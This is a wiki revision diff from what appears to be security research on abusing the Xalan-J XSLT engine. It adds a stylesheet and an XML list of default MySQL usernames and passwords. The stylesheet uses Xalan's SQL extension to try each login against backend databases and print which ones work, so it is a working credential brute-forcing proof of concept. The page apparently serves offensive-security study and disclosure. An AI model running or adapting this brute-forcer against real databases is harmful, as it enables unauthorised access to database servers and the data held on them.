Changes for page Engine_XalanJ

Last modified by Nicolas Gregoire on 2012/01/31 17:35
From version Icon 62.1 Icon
edited by Nicolas Gregoire
on 2012/01/12 22:13
Change comment: Upload new attachment xalanj-jdbc-query.xsl
To version Icon 63.1 Icon
edited by Nicolas Gregoire
on 2012/01/12 22:14
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -66,12 +66,16 @@
66 66  
67 67  == JDBC connectivity ==
68 68  
69 -It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver. The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result.
69 +It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver.
70 70  
71 +=== Simple connection ===
72 +
73 +The [[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]] PoC simply connects to a local MySQL database using some hard-coded credentials, executes a query and displays the result.
74 +
71 71  |=Namespace|=Extension function|=PoC
72 72  |org.apache.xalan.lib.sql.XConnection|new(), query() and close()|[[xalanj-jdbc-query.xsl>>attach:xalanj-jdbc-query.xsl]]
73 73  
74 -=== Brute-force ===
78 +=== Credentials brute-forcing ===
75 75  
76 76  The [[xalanj-jdbc-bruteforce.xsl>>attach:xalanj-jdbc-bruteforce.xsl]] file will read some tuples (JDBC driver, database URL, username, passsword) from a XML file ([[xalanj-jdbc-bruteforce.xml>>attach:xalanj-jdbc-bruteforce.xml]]) and try to login with each one, effectively brute-forcing credentials from the engine side (usually on the backend ;-).
77 77  
Icon xalanj-jdbc-bruteforce.xml
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +775 bytes
Content
... ... @@ -1,0 +1,35 @@
1 +<data>
2 + <foobar>
3 + <DBINFO>
4 + <dbdriver>com.mysql.jdbc.Driver</dbdriver>
5 + <dburl>jdbc:mysql://localhost/</dburl>
6 + <user>root</user>
7 + <password></password>
8 + </DBINFO>
9 + </foobar>
10 + <foobar>
11 + <DBINFO>
12 + <dbdriver>com.mysql.jdbc.Driver</dbdriver>
13 + <dburl>jdbc:mysql://localhost/</dburl>
14 + <user>root</user>
15 + <password>uberpasswd</password>
16 + </DBINFO>
17 + </foobar>
18 + <foobar>
19 + <DBINFO>
20 + <dbdriver>com.mysql.jdbc.Driver</dbdriver>
21 + <dburl>jdbc:mysql://localhost/</dburl>
22 + <user>root</user>
23 + <password>cnam</password>
24 + </DBINFO>
25 + </foobar>
26 + <foobar>
27 + <DBINFO>
28 + <dbdriver>com.mysql.jdbc.Driver</dbdriver>
29 + <dburl>jdbc:mysql://localhost/</dburl>
30 + <user>pma</user>
31 + <password>pma</password>
32 + </DBINFO>
33 + </foobar>
34 +</data>
35 +
Icon xalanj-jdbc-bruteforce.xsl
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +979 bytes
Content
... ... @@ -1,0 +1,29 @@
1 +<?xml version="1.0"?>
2 +
3 +<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
4 + version="1.0"
5 + xmlns:sql="org.apache.xalan.lib.sql.XConnection"
6 + extension-element-prefixes="sql">
7 +
8 +<xsl:output method="text" indent="yes"/>
9 +<xsl:variable name="query">SELECT "OK !!"</xsl:variable>
10 +
11 +<xsl:template match="//data">
12 + <xsl:for-each select="foobar">
13 +
14 + <xsl:variable name="cinfo" select="DBINFO"/>
15 + <xsl:variable name="user" select="DBINFO/user/text()"/>
16 + <xsl:variable name="passwd" select="DBINFO/password/text()"/>
17 +
18 + <xsl:variable name="db" select="sql:new($cinfo)"/>
19 + <xsl:variable name="data" select='sql:query($db, $query)'/>
20 +
21 + <xsl:copy-of select="concat('Username : [', $user, '] / ')" />
22 + <xsl:copy-of select="concat('Password : [', $passwd, '] : ')" />
23 + <xsl:copy-of select="$data" /><xsl:copy-of select="'&#x0A;'" />
24 +
25 + </xsl:for-each>
26 +</xsl:template>
27 +
28 +</xsl:stylesheet>
29 +